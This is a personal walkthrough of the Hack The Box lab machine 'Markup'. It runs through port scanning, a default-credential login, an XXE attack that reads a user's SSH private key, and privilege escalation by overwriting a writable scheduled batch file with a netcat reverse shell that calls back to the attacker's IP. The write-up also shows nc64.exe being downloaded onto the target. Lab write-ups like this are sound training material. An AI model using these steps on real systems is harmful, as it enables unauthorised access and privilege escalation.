Markup - wook413

#windows #hackthebox #veryeasy ![[Pasted image 20250610231148.png]] --- # Enumeration - Nmap ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS 10.129.95.192 --min-rate 4000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-10 21:45 CDT Nmap scan report for 10.129.95.192 Host is up (0.047s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https Nmap done: 1 IP address (1 host up) scanned in 33.13 seconds ``` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sCV 10.129.95.192 -p 22,80,443 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-10 21:47 CDT Nmap scan report for 10.129.95.192 Host is up (0.047s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0) | ssh-hostkey: | 3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA) | 256 90:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97 (ECDSA) |_ 256 f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28) |_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: MegaShopping 443/tcp open ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 |_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28 |_http-title: MegaShopping | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.53 seconds ``` # What version of Apache is running on the target's port 80? **Apache 2.4.41** # What username:password combination logs in successfully? **admin:password** ![[Pasted image 20250610220325.png]] # What is the word at the top of the page that accepts user input? **Order** ![[Pasted image 20250610220437.png]] # What XML version is used on the target? **1.0** ![[Pasted image 20250610220710.png]] # What does the XXE / XEE attack acronym stand for? **XML External Entity** # What username can we find on the webpage's HTML code? **Daniel** ![[Pasted image 20250610220853.png]] # What is the file located in the Log-Management folder on the target? The output of `win.ini` file on the target itself is displayed in our response message, which proves that the XML External Entity vulnerability is present. ![[Pasted image 20250610223053.png]] We confirmed that the target system is vulnerable to XXE vulnerability, now we can do is navigate to `daniel` user's `.ssh` folder in order to attempt to retrieve their private key. ![[Pasted image 20250610223253.png]] now we can log into SSH using that key. ```bash vim id_rsa # copy-paste the key in the response chmod 400 id_rsa ssh -i id_rsa [email protected] ``` successfully logged into SSH ```bash Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved. daniel@MARKUP C:\Users\daniel>whoami markup\daniel ``` I found `job.bat` in `C:\Log-Management` ```powershell daniel@MARKUP C:\Log-Management>dir Volume in drive C has no label. Volume Serial Number is BA76-B4E3 Directory of C:\Log-Management 03/12/2020 03:56 AM <DIR> . 03/12/2020 03:56 AM <DIR> .. 03/06/2020 02:42 AM 346 job.bat 1 File(s) 346 bytes 2 Dir(s) 7,349,862,400 bytes free ``` **job.bat** # What executable is mentioned in the file mentioned before? **wevtutil.exe** ```powershell daniel@MARKUP C:\Log-Management>type job.bat @echo off FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V IF (%adminTest%)==(Access) goto noAdmin for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G") echo. echo Event Logs have been cleared! goto theEnd :do_clear wevtutil.exe cl %1 goto :eof :noAdmin echo You must run this script as an Administrator! :theEnd exit ``` # Submit user flag Found `user.txt` in `C:\Users\daniel\Desktop` ```bash daniel@MARKUP C:\Users\daniel\Desktop>type user.txt 032d... ``` # Submit root flag `icacls job.bat` command displays the **Access Control List** for the file `job.bat`. - `BUILTIN\Users:(F)` - The Users group has Full control over the file. - This entry is not inherited - it was set directly on this file - `NT AUTHORITY\SYSTEM:(I)(F)` - The SYSTEM account has Full Control - The `(I)` indicates this permission is inherited from the parent folder. - `BUILTIN\Administrators:(I)(F)` - This Administrators group has Full control - This is also an inherited permission. - `BUILTIN\Users:(I)(RX)` - The Users group also has *Read & execute* permissions via Inheritance. - This means Users have both Full control directly, and Read & execute via inheritance. ```powershell daniel@MARKUP C:\Log-Management>icacls job.bat job.bat BUILTIN\Users:(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Successfully processed 1 files; Failed processing 0 files ``` `ps` command in Powershell reveals that the process mentioned in `job.bat` file, `wevtutil`, is indeed running. ![[Pasted image 20250610225757.png]] In my local environment ```bash wget https://github.com/int0x33/nc.exe/raw/master/nc64.exe python3 -m http.server 8888 ``` On the host ```powershell PS C:\Log-Management> wget http://10.10.14.39:8888/nc64.exe -outfile nc64.exe PS C:\Log-Management> dir Directory: C:\Log-Management Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 3/6/2020 1:42 AM 346 job.bat -a---- 6/10/2025 9:02 PM 45272 nc64.exe ``` Since we have full control over the `job.bat` script, we will modify its' contents by running the following command in cmd not powershell. ```powershell daniel@MARKUP C:\Log-Management>echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.39 1234 > C:\Log-Management\j ob.bat ``` set up a listener ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nc -lvnp 1234 [sudo] password for parallels: listening on [any] 1234 ... connect to [10.10.14.39] from (UNKNOWN) [10.129.95.192] 49790 Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami markup\administrator ``` In `C:\Users\Administrator\Desktop`, I found `root.txt` ```powershell f574... ```